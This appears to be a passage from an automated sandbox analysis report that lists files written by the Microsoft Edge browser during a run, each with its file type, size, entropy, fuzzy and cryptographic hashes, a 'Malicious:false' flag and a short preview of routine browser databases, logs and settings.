                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 12, cookie 0x3, schema 4, UTF-8, version-valid-for 7
                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                    Size (bytes):49152
                                                                                                                                                                                                                                                                                                    Entropy (8bit):3.6481262007522295
                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                    SSDEEP:384:aj9P0LEcAjlrP/KbtpQkQerE773pL9hCgam6ItRKToaAu:adyKlrP/se2E7Pv9RKcC
                                                                                                                                                                                                                                                                                                    MD5:DF0D2FCFE368ECEEB78C13B004DAEDBD
                                                                                                                                                                                                                                                                                                    SHA1:1E9121546F3F0758130C2A37F274C56BCE00B702
                                                                                                                                                                                                                                                                                                    SHA-256:91ED1A0AB9A23419FBD76C4A2435EDC1CCBAB5FC481528342F34159558CA8ABB
                                                                                                                                                                                                                                                                                                    SHA-512:13179A41D9084C4778EFD801A91E2D18B87C5BA662BF08170564DEB9742BD0F93B00D538413B6E6A8D38171E7EFC190E17EAB09C3B396835FC02E9F6A2E5E474
                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                    Preview:SQLite format 3......@ ..........................................................................j..........g...:.8....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                    Size (bytes):409
                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.2540887096552105
                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                    SSDEEP:12:0ItwVvVaYeb8rcHEZrELFUt8PKg/+PKI5OaYeb8rcHEZrEZSJ:CVaYeb8nZrExg84OaYeb8nZrEZe
                                                                                                                                                                                                                                                                                                    MD5:7DD69034996021B6ED2AE58C963731CD
                                                                                                                                                                                                                                                                                                    SHA1:CD75076F6FB721D8EEF7912181EB747258E4468D
                                                                                                                                                                                                                                                                                                    SHA-256:D812B8FAB21BF6BE48EB37051A2E98D5CF26AEAF488C82199DC8A59644A74411
                                                                                                                                                                                                                                                                                                    SHA-512:64CA9D9377A0D57D54E29EC3AB223177FDA1BE62101935E05A0C5F69825CF85D998C38379CCB6258CA12ADC4DC36E3706F7E5AF3B10FF2919A27A98426709AD3
                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                    Preview:2024/12/03-20:02:17.513 888 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/MANIFEST-000001.2024/12/03-20:02:17.514 888 Recovering log #3.2024/12/03-20:02:17.514 888 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/000003.log .
                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                    Size (bytes):409
                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.2540887096552105
                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                    SSDEEP:12:0ItwVvVaYeb8rcHEZrELFUt8PKg/+PKI5OaYeb8rcHEZrEZSJ:CVaYeb8nZrExg84OaYeb8nZrEZe
                                                                                                                                                                                                                                                                                                    MD5:7DD69034996021B6ED2AE58C963731CD
                                                                                                                                                                                                                                                                                                    SHA1:CD75076F6FB721D8EEF7912181EB747258E4468D
                                                                                                                                                                                                                                                                                                    SHA-256:D812B8FAB21BF6BE48EB37051A2E98D5CF26AEAF488C82199DC8A59644A74411
                                                                                                                                                                                                                                                                                                    SHA-512:64CA9D9377A0D57D54E29EC3AB223177FDA1BE62101935E05A0C5F69825CF85D998C38379CCB6258CA12ADC4DC36E3706F7E5AF3B10FF2919A27A98426709AD3
                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                    Preview:2024/12/03-20:02:17.513 888 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/MANIFEST-000001.2024/12/03-20:02:17.514 888 Recovering log #3.2024/12/03-20:02:17.514 888 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/000003.log .
                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                    Size (bytes):919
                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.5930378888169
                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                    SSDEEP:24:0nZWJalvXarQm7sG0XZVh08TV0374FnMyG:yZkalvzBXZVh9V0374FMyG
                                                                                                                                                                                                                                                                                                    MD5:84B673FF675D947D9D9C4EFCE351D290
                                                                                                                                                                                                                                                                                                    SHA1:1FB27B2AC42A5D513C62B6BA9AB734584B29B208
                                                                                                                                                                                                                                                                                                    SHA-256:29382D10ED5863C9C0359664173C7792F0E3F5943BA8A7425F15AB95D7B1AF78
                                                                                                                                                                                                                                                                                                    SHA-512:78A54DA340286AB26600F054923B0C972FABFBD634FED500BD1255EC2A4ED964BEDDF9A3BFBC119B3F0CA4C9EEE13B984F35A6262C7CCF439D55C50072634E39
                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                    Preview:7k)n.................VERSION.1..META:https://ntp.msn.com..............!_https://ntp.msn.com..LastKnownPV..1733274146170.._https://ntp.msn.com..MUID!.0D5C2060AD936F240B4A352BAC196EE0.._https://ntp.msn.com..bkgdV...{"cachedVideoId":-1,"lastUpdatedTime":1733274146268,"schedule":[-1,21,-1,-1,18,31,-1],"scheduleFixed":[-1,21,-1,-1,18,31,-1],"simpleSchedule":[18,16,32,11,42,49,40]}.%_https://ntp.msn.com..clean_meta_flag..1.5_https://ntp.msn.com..enableUndersideAutoOpenFromEdge..false.7_https://ntp.msn.com..nurturing_interaction_trace_ls_id..1733274146123.&_https://ntp.msn.com..oneSvcUniTunMode..header."_https://ntp.msn.com..pageVersions..{"dhp":"20241128.50"}.*_https://ntp.msn.com..pivotSelectionSource..sticky.#_https://ntp.msn.com..selectedPivot..myFeed.#_https://ntp.msn.com..switchedPivot..myFeed.O_https://ntp.msn.com..Tue Dec 03 2024 20:02:25 GMT-0500 (Eastern Standard Time).!_https://ntp.msn.com..storageTest
                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                    Size (bytes):340
                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.07087796703015
                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                    SSDEEP:6:iXbZm+q2PN723oH+Tcwt8a2jMGIFUt8vXb3Zmw+vXbdu5VkwON723oH+Tcwt8a23:0bZm+vVaYeb8EFUt8Pb3/+Pbdu5V5Oao
                                                                                                                                                                                                                                                                                                    MD5:32C657841E0A12D13696E099DF019C43
                                                                                                                                                                                                                                                                                                    SHA1:EC915C79824669F770EAF8CC8EBE7322C4729D4F
                                                                                                                                                                                                                                                                                                    SHA-256:662818C86722D3438B7082815C8D82393F929DF97C0A511A5ABBB65D7C48E79E
                                                                                                                                                                                                                                                                                                    SHA-512:F5DD1882A27FD49557EB0C05666A4B5FCA58CD13A48FBC1EFB74C63B76D94F32B6B512E4A5269BBBDA6958F4A8FBB430840E9972D40AC7BC9D083D7F2B17BFB5
                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                    Preview:2024/12/03-20:02:11.860 1a2c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/MANIFEST-000001.2024/12/03-20:02:11.861 1a2c Recovering log #3.2024/12/03-20:02:11.864 1a2c Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/000003.log .
                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                    Size (bytes):340
                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.07087796703015
                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                    SSDEEP:6:iXbZm+q2PN723oH+Tcwt8a2jMGIFUt8vXb3Zmw+vXbdu5VkwON723oH+Tcwt8a23:0bZm+vVaYeb8EFUt8Pb3/+Pbdu5V5Oao
                                                                                                                                                                                                                                                                                                    MD5:32C657841E0A12D13696E099DF019C43
                                                                                                                                                                                                                                                                                                    SHA1:EC915C79824669F770EAF8CC8EBE7322C4729D4F
                                                                                                                                                                                                                                                                                                    SHA-256:662818C86722D3438B7082815C8D82393F929DF97C0A511A5ABBB65D7C48E79E
                                                                                                                                                                                                                                                                                                    SHA-512:F5DD1882A27FD49557EB0C05666A4B5FCA58CD13A48FBC1EFB74C63B76D94F32B6B512E4A5269BBBDA6958F4A8FBB430840E9972D40AC7BC9D083D7F2B17BFB5
                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                    Preview:2024/12/03-20:02:11.860 1a2c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/MANIFEST-000001.2024/12/03-20:02:11.861 1a2c Recovering log #3.2024/12/03-20:02:11.864 1a2c Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/000003.log .
                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                    Size (bytes):40
                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.1275671571169275
                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                    SSDEEP:3:Y2ktGMxkAXWMSN:Y2xFMSN
                                                                                                                                                                                                                                                                                                    MD5:20D4B8FA017A12A108C87F540836E250
                                                                                                                                                                                                                                                                                                    SHA1:1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
                                                                                                                                                                                                                                                                                                    SHA-256:6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
                                                                                                                                                                                                                                                                                                    SHA-512:507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                    Preview:{"SDCH":{"dictionaries":{},"version":2}}
                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                    Size (bytes):2
                                                                                                                                                                                                                                                                                                    Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                    SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                                    MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                                    SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                                    SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                                    SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                    Preview:[]
                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 8, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 8
                                                                                                                                                                                                                                                                                                    Category:modified
                                                                                                                                                                                                                                                                                                    Size (bytes):20480
                                                                                                                                                                                                                                                                                                    Entropy (8bit):2.7767176746266817
                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                    SSDEEP:192:tTkydSYSD0BE8F4kFZdLzgY0lA+NXcf0L/ZJVb:VkydShDgEy4kvdXp+NXI0LhJVb
                                                                                                                                                                                                                                                                                                    MD5:476B0C83E31DAE8F95D6093BD8472BB5
                                                                                                                                                                                                                                                                                                    SHA1:618C5A171F826A39FEEC9C5346A56338AACA9AF4
                                                                                                                                                                                                                                                                                                    SHA-256:93C35B8E4580FDA457B02D8EF2DC1E2A4AE24DBDF8C12F3177564281923A8241
                                                                                                                                                                                                                                                                                                    SHA-512:A636FDBA616052D6A616778C83A4B9A72BF2104A9E4962E468CD2F7BE096E183B0CF2580BB2D2EF4B182EA7E54663E31201A55CB93A1C61E8E0D6D2AB319199E
                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                    Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 6, database pages 9, cookie 0x4, schema 4, UTF-8, version-valid-for 6
                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                    Size (bytes):36864
                                                                                                                                                                                                                                                                                                    Entropy (8bit):1.5370067561492284
                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                    SSDEEP:96:uIEumQv8m1ccnvS6hHSRRSPIUlLgxb+D1a:uIEumQv8m1ccnvS6xQU20E
                                                                                                                                                                                                                                                                                                    MD5:B2A2DF67466A8E6E11ADB8E42ACC84B8
                                                                                                                                                                                                                                                                                                    SHA1:6CE40BB6A9B702A78F8F41CE4E798C298F8E21A1
                                                                                                                                                                                                                                                                                                    SHA-256:84B6C58057201F9F16DA30025E44D6AEE651F4AC424A466EEE13F10A43D549DE
                                                                                                                                                                                                                                                                                                    SHA-512:0A5418043DFC8860D6FB38F3A0EE0C870ABC941C82E72D46ED15F330E1D82D19456A13290F7F17B8F1E5FAC7C912B84450C2B1A2C8A2CE6274ACE1B0FAF62ADC
                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                    Preview:SQLite format 3......@ ..........................................................................j..........g...D.........7............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                    Size (bytes):2
                                                                                                                                                                                                                                                                                                    Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                    SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                                    MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                                    SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                                    SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                                    SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                    Preview:[]
                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                    Size (bytes):2
                                                                                                                                                                                                                                                                                                    Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                    SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                                    MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                                    SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                                    SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                                    SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                    Preview:[]
                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                    Size (bytes):2
                                                                                                                                                                                                                                                                                                    Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                    SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                                    MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                                    SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                                    SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                                    SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                    Preview:[]
                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                    Size (bytes):40
                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.1275671571169275
                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                    SSDEEP:3:Y2ktGMxkAXWMSN:Y2xFMSN
                                                                                                                                                                                                                                                                                                    MD5:20D4B8FA017A12A108C87F540836E250
                                                                                                                                                                                                                                                                                                    SHA1:1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
                                                                                                                                                                                                                                                                                                    SHA-256:6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
                                                                                                                                                                                                                                                                                                    SHA-512:507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                    Preview:{"SDCH":{"dictionaries":{},"version":2}}
                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                    Size (bytes):2
                                                                                                                                                                                                                                                                                                    Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                    SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                                    MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                                    SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                                    SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                                    SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                    Preview:[]
                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                    Size (bytes):2
                                                                                                                                                                                                                                                                                                    Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                    SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                                    MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                                    SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                                    SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                                    SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                    Preview:[]
                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x2, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                    Size (bytes):20480
                                                                                                                                                                                                                                                                                                    Entropy (8bit):0.8350301952073809
                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                    SSDEEP:24:TLSOUOq0afDdWec9sJlAMoqsgC7zn2z8ZI7J5fc:T+OUzDbg3sAM/sgCnn2ztc
                                                                                                                                                                                                                                                                                                    MD5:0DAD8D7F079797377CD56DAE47E1A619
                                                                                                                                                                                                                                                                                                    SHA1:A353C01C5B9BA9E0315ABA74D3337B7D6EE97CB2
                                                                                                                                                                                                                                                                                                    SHA-256:7BDA584E0C1BE9E104065370FD279A7E771D7EB4F7E4CC7C80F146931F150E33
                                                                                                                                                                                                                                                                                                    SHA-512:5A57C0D303672564DDEAA08B5DAAEE1BA24B67C46100720CE69F0908427ACE55F330D96A772D0E1F96B595FBBD70E6145AA464FC4F312EFE095F9AC909E304E8
                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                    Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                    Size (bytes):9861
                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.107414975211011
                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                    SSDEEP:192:stikdpPs224taFvrE9kuoS8wbV+FAGSQAdUitPbYJ:stiQPs224tCDwbGCQXp
                                                                                                                                                                                                                                                                                                    MD5:C142ACF7F709F2ED8C74E888756518C6
                                                                                                                                                                                                                                                                                                    SHA1:3DF8A1314DC73A2E11F9B67657BABA716308A7D1
                                                                                                                                                                                                                                                                                                    SHA-256:F0882C2886E056B6B574705FCCD34128FA937C4945B4D0CC1F958C0B66540402
                                                                                                                                                                                                                                                                                                    SHA-512:1C24493118C99B119EC76E7AB9B3FD8030D4C4F66579AAF76B5837F445C10142C23EECA6825B295FF8B528A00E76A2BDC01DB0AC9B3FBA15DBB2C2F41D03EDD6
                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                    Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13377747732048100","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340961151815957","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"should_reset_check_default_browser":false,"toolbar_extensions_hub_button_visibility":0,"underside_chat_bing_signed_in_status":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"browser_content_container_height":882,"browser_content_container_width":1236,"browser_content_container_x":0,"browser_content_container_y":102,"continuous_migration":{"ci_correction_for_holdout_treatment_state":1,"datatype_details_migration_performed":true},"co
                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                    Size (bytes):9861
                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.107414975211011
                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                    SSDEEP:192:stikdpPs224taFvrE9kuoS8wbV+FAGSQAdUitPbYJ:stiQPs224tCDwbGCQXp
                                                                                                                                                                                                                                                                                                    MD5:C142ACF7F709F2ED8C74E888756518C6
                                                                                                                                                                                                                                                                                                    SHA1:3DF8A1314DC73A2E11F9B67657BABA716308A7D1
                                                                                                                                                                                                                                                                                                    SHA-256:F0882C2886E056B6B574705FCCD34128FA937C4945B4D0CC1F958C0B66540402
                                                                                                                                                                                                                                                                                                    SHA-512:1C24493118C99B119EC76E7AB9B3FD8030D4C4F66579AAF76B5837F445C10142C23EECA6825B295FF8B528A00E76A2BDC01DB0AC9B3FBA15DBB2C2F41D03EDD6
                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                    Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13377747732048100","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340961151815957","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"should_reset_check_default_browser":false,"toolbar_extensions_hub_button_visibility":0,"underside_chat_bing_signed_in_status":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"browser_content_container_height":882,"browser_content_container_width":1236,"browser_content_container_x":0,"browser_content_container_y":102,"continuous_migration":{"ci_correction_for_holdout_treatment_state":1,"datatype_details_migration_performed":true},"co
                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                    Size (bytes):24853
                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.565133283975249
                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                    SSDEEP:768:W+OAYjWIJW5wPzf4jm8F1+UoAYDCx9Tuqh0VfUC9xbog/OVPtRIgtZrrwXLpBtuk:WDJjzJWaPzfqmu1jak3zgftj
                                                                                                                                                                                                                                                                                                    MD5:87222E5DE19592B82B29F2F42B282670
                                                                                                                                                                                                                                                                                                    SHA1:A8C13C7ED3D569ADFCFBF645EC125718726C91DC
                                                                                                                                                                                                                                                                                                    SHA-256:787D7744DD26C4AD1381210FAFA28C6CC7644028AB5695C135D9D9B68DE09F0F
                                                                                                                                                                                                                                                                                                    SHA-512:70B79E198C8EB0719AFA3915761BF56B046B4C88C4E41DF534CE8515CCB383C3F3C070681A2F6149DB6F8B6D756AD5BEA6EE153063B4BAD0F34160DD1123200F
                                                                                                                                                                                                                                                                                                    Malicious:false
